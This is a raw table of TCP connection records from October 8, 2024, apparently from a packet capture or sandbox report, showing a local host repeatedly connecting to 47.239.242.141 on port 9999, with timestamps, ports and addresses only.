Oct 8, 2024 04:22:33.429116964 CEST	54423	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:33.429254055 CEST	54423	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:33.434082031 CEST	9999	54423	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:34.338357925 CEST	9999	54423	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:34.338413954 CEST	9999	54423	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:34.338421106 CEST	54423	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:34.338464975 CEST	54423	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:34.338545084 CEST	54423	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:34.343369961 CEST	9999	54423	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:34.452984095 CEST	54424	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:34.457993984 CEST	9999	54424	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:34.458153963 CEST	54424	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:34.458327055 CEST	54424	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:34.463200092 CEST	9999	54424	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:35.370336056 CEST	9999	54424	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:35.370382071 CEST	9999	54424	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:35.371676922 CEST	54424	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:35.371676922 CEST	54424	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:35.376760006 CEST	9999	54424	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:35.483628035 CEST	54425	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:35.488796949 CEST	9999	54425	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:35.491755962 CEST	54425	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:35.495130062 CEST	54425	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:35.499999046 CEST	9999	54425	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:36.426616907 CEST	9999	54425	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:36.426668882 CEST	9999	54425	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:36.426680088 CEST	54425	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:36.426759958 CEST	54425	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:36.426853895 CEST	54425	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:36.431636095 CEST	9999	54425	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:36.531373024 CEST	54426	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:36.536431074 CEST	9999	54426	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:36.536504030 CEST	54426	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:36.536627054 CEST	54426	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:36.541438103 CEST	9999	54426	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:37.437613964 CEST	9999	54426	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:37.437659979 CEST	9999	54426	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:37.441154003 CEST	54426	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:37.441154003 CEST	54426	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:37.446058035 CEST	9999	54426	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:37.549061060 CEST	54427	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:37.554147959 CEST	9999	54427	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:37.557256937 CEST	54427	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:37.557256937 CEST	54427	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:37.562129974 CEST	9999	54427	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:38.483903885 CEST	9999	54427	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:38.483961105 CEST	9999	54427	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:38.483985901 CEST	54427	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:38.484059095 CEST	54427	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:38.484206915 CEST	54427	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:38.488969088 CEST	9999	54427	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:38.594382048 CEST	54428	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:38.599330902 CEST	9999	54428	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:38.599412918 CEST	54428	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:38.599610090 CEST	54428	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:38.604476929 CEST	9999	54428	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:39.522885084 CEST	9999	54428	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:39.522998095 CEST	9999	54428	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:39.523041010 CEST	54428	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:39.523080111 CEST	54428	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:39.523430109 CEST	54428	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:39.529592991 CEST	9999	54428	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:39.641885996 CEST	54429	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:39.648313046 CEST	9999	54429	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:39.648401022 CEST	54429	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:39.648511887 CEST	54429	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:39.654723883 CEST	9999	54429	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:40.594402075 CEST	9999	54429	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:40.594465971 CEST	54429	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:40.594505072 CEST	9999	54429	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:40.594552994 CEST	54429	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:40.594644070 CEST	54429	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:40.599525928 CEST	9999	54429	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:40.703696012 CEST	54430	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:40.708643913 CEST	9999	54430	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:40.708713055 CEST	54430	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:40.708831072 CEST	54430	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:40.713674068 CEST	9999	54430	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:41.622319937 CEST	9999	54430	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:41.622400045 CEST	9999	54430	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:41.622442961 CEST	54430	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:41.622972012 CEST	54430	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:41.733371973 CEST	54430	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:41.733685017 CEST	54431	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:41.738344908 CEST	9999	54430	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:41.738663912 CEST	9999	54431	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:41.739073038 CEST	54431	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:41.739180088 CEST	54431	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:41.744024992 CEST	9999	54431	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:42.638256073 CEST	9999	54431	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:42.638310909 CEST	54431	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:42.638324976 CEST	9999	54431	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:42.638370037 CEST	54431	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:42.638452053 CEST	54431	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:42.645287991 CEST	9999	54431	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:42.750732899 CEST	54432	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:42.755736113 CEST	9999	54432	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:42.755796909 CEST	54432	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:42.756000996 CEST	54432	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:42.760942936 CEST	9999	54432	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:43.648819923 CEST	9999	54432	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:43.648865938 CEST	9999	54432	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:43.648966074 CEST	54432	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:43.649101973 CEST	54432	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:43.653898001 CEST	9999	54432	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:43.767435074 CEST	54433	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:43.772484064 CEST	9999	54433	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:43.772983074 CEST	54433	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:43.773071051 CEST	54433	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:43.777858973 CEST	9999	54433	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:44.685625076 CEST	9999	54433	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:44.685672998 CEST	9999	54433	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:44.685703039 CEST	54433	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:44.685739040 CEST	54433	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:44.685852051 CEST	54433	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:44.690675974 CEST	9999	54433	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:44.796804905 CEST	54434	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:44.802727938 CEST	9999	54434	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:44.802787066 CEST	54434	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:44.802910089 CEST	54434	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:44.807940006 CEST	9999	54434	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:45.719075918 CEST	9999	54434	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:45.719208956 CEST	9999	54434	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:45.720297098 CEST	54434	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:45.720297098 CEST	54434	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:45.725852966 CEST	9999	54434	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:45.829140902 CEST	54435	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:45.834055901 CEST	9999	54435	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:45.834203959 CEST	54435	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:45.834376097 CEST	54435	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:45.839322090 CEST	9999	54435	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:46.730174065 CEST	9999	54435	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:46.730199099 CEST	9999	54435	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:46.730235100 CEST	54435	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:46.730266094 CEST	54435	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:46.730341911 CEST	54435	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:46.735157013 CEST	9999	54435	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:46.843458891 CEST	54436	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:46.848968029 CEST	9999	54436	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:46.849033117 CEST	54436	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:46.849220037 CEST	54436	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:46.854955912 CEST	9999	54436	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:47.770337105 CEST	9999	54436	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:47.770448923 CEST	9999	54436	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:47.770489931 CEST	54436	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:47.773137093 CEST	54436	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:47.877053976 CEST	54436	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:47.877063990 CEST	54437	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:47.882761955 CEST	9999	54436	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:47.882797956 CEST	9999	54437	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:47.882909060 CEST	54437	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:47.885044098 CEST	54437	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:47.890774012 CEST	9999	54437	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:48.779321909 CEST	9999	54437	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:48.779351950 CEST	9999	54437	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:48.779402018 CEST	54437	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:48.779402018 CEST	54437	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:48.779509068 CEST	54437	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:48.784338951 CEST	9999	54437	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:48.889952898 CEST	54438	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:48.894925117 CEST	9999	54438	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:48.895004988 CEST	54438	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:48.895103931 CEST	54438	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:48.900051117 CEST	9999	54438	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:49.829688072 CEST	9999	54438	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:49.829744101 CEST	9999	54438	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:49.830759048 CEST	54438	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:49.853986025 CEST	54438	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:49.858913898 CEST	9999	54438	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:49.974509001 CEST	54439	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:49.979466915 CEST	9999	54439	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:49.980153084 CEST	54439	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:49.980185032 CEST	54439	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:49.985148907 CEST	9999	54439	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:50.892997980 CEST	9999	54439	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:50.893078089 CEST	54439	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:50.893157005 CEST	9999	54439	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:50.893199921 CEST	54439	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:50.998768091 CEST	54439	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:50.999003887 CEST	54440	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:51.003554106 CEST	9999	54439	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:51.003887892 CEST	9999	54440	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:51.004050970 CEST	54440	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:51.004225016 CEST	54440	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:51.008975983 CEST	9999	54440	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:51.920039892 CEST	9999	54440	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:51.920167923 CEST	9999	54440	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:51.920244932 CEST	54440	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:51.920428038 CEST	54440	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:51.925167084 CEST	9999	54440	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:52.032898903 CEST	54441	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:52.037950993 CEST	9999	54441	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:52.039036989 CEST	54441	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:52.039221048 CEST	54441	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:52.044279099 CEST	9999	54441	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:52.959127903 CEST	9999	54441	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:52.959197998 CEST	54441	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:52.959245920 CEST	9999	54441	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:52.959287882 CEST	54441	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:52.959341049 CEST	54441	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:52.964060068 CEST	9999	54441	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:53.061908007 CEST	54442	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:53.066843987 CEST	9999	54442	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:53.066920042 CEST	54442	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:53.067013025 CEST	54442	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:53.071829081 CEST	9999	54442	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:53.985024929 CEST	9999	54442	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:53.985100985 CEST	54442	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:53.985117912 CEST	9999	54442	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:53.985239029 CEST	54442	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:53.985316038 CEST	54442	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:53.990415096 CEST	9999	54442	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:54.093955040 CEST	54443	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:54.098850012 CEST	9999	54443	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:54.098918915 CEST	54443	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:54.099076033 CEST	54443	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:54.103854895 CEST	9999	54443	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:55.012942076 CEST	9999	54443	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:55.012967110 CEST	9999	54443	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:55.013315916 CEST	54443	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:55.013315916 CEST	54443	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:55.014149904 CEST	54443	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:55.019818068 CEST	9999	54443	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:55.125099897 CEST	54444	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:55.130036116 CEST	9999	54444	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:55.135190964 CEST	54444	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:55.135190964 CEST	54444	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:55.140166998 CEST	9999	54444	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:56.035742998 CEST	9999	54444	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:56.035794020 CEST	9999	54444	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:56.037195921 CEST	54444	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:56.037195921 CEST	54444	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:56.042109966 CEST	9999	54444	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:56.140572071 CEST	54445	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:56.145575047 CEST	9999	54445	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:56.145648003 CEST	54445	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:56.145829916 CEST	54445	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:56.150643110 CEST	9999	54445	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:57.079556942 CEST	9999	54445	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:57.079631090 CEST	54445	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:57.079636097 CEST	9999	54445	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:57.079695940 CEST	54445	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:57.079741955 CEST	54445	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:57.084827900 CEST	9999	54445	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:57.187948942 CEST	54446	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:57.194691896 CEST	9999	54446	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:57.197242975 CEST	54446	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:57.197242975 CEST	54446	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:57.202219963 CEST	9999	54446	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:58.098718882 CEST	9999	54446	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:58.098793030 CEST	54446	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:58.098939896 CEST	9999	54446	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:58.098984957 CEST	54446	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:58.202864885 CEST	54446	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:58.203221083 CEST	54447	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:58.209034920 CEST	9999	54446	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:58.209072113 CEST	9999	54447	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:58.209132910 CEST	54447	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:58.209486961 CEST	54447	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:58.214289904 CEST	9999	54447	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:59.161474943 CEST	9999	54447	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:59.161528111 CEST	9999	54447	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:59.161578894 CEST	54447	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:59.161735058 CEST	54447	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:59.161988020 CEST	54447	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:59.166780949 CEST	9999	54447	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:59.265073061 CEST	54448	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:59.270160913 CEST	9999	54448	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:59.270281076 CEST	54448	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:59.270417929 CEST	54448	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:59.275229931 CEST	9999	54448	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:00.189142942 CEST	9999	54448	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:00.189199924 CEST	9999	54448	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:00.189223051 CEST	54448	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:00.189292908 CEST	54448	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:00.189388037 CEST	54448	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:00.195858955 CEST	9999	54448	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:00.297116995 CEST	54449	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:00.302253962 CEST	9999	54449	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:00.302320004 CEST	54449	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:00.302474022 CEST	54449	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:00.307286024 CEST	9999	54449	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:01.194242954 CEST	9999	54449	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:01.194318056 CEST	9999	54449	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:01.194355011 CEST	54449	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:01.200427055 CEST	54449	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:01.311819077 CEST	54449	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:01.311819077 CEST	54450	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:01.316817999 CEST	9999	54449	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:01.316854000 CEST	9999	54450	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:01.320800066 CEST	54450	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:01.320800066 CEST	54450	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:01.325680971 CEST	9999	54450	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:02.244476080 CEST	9999	54450	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:02.244518995 CEST	9999	54450	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:02.244535923 CEST	54450	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:02.244568110 CEST	54450	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:02.244666100 CEST	54450	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:02.249481916 CEST	9999	54450	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:02.359369040 CEST	54451	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:02.365430117 CEST	9999	54451	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:02.365510941 CEST	54451	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:02.365736961 CEST	54451	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:02.370541096 CEST	9999	54451	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:03.284060955 CEST	9999	54451	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:03.284116983 CEST	9999	54451	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:03.284241915 CEST	54451	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:03.285198927 CEST	54451	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:03.290121078 CEST	9999	54451	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:03.389791012 CEST	54452	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:03.394717932 CEST	9999	54452	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:03.395298958 CEST	54452	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:03.395642996 CEST	54452	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:03.400540113 CEST	9999	54452	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:04.286444902 CEST	9999	54452	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:04.286501884 CEST	9999	54452	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:04.286575079 CEST	54452	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:04.593482018 CEST	54452	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:04.598501921 CEST	9999	54452	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:04.702543974 CEST	54453	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:04.709650040 CEST	9999	54453	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:04.709717035 CEST	54453	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:04.709871054 CEST	54453	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:04.716481924 CEST	9999	54453	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:05.622715950 CEST	9999	54453	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:05.622788906 CEST	54453	9999	192.168.2.4	47.239.242.141
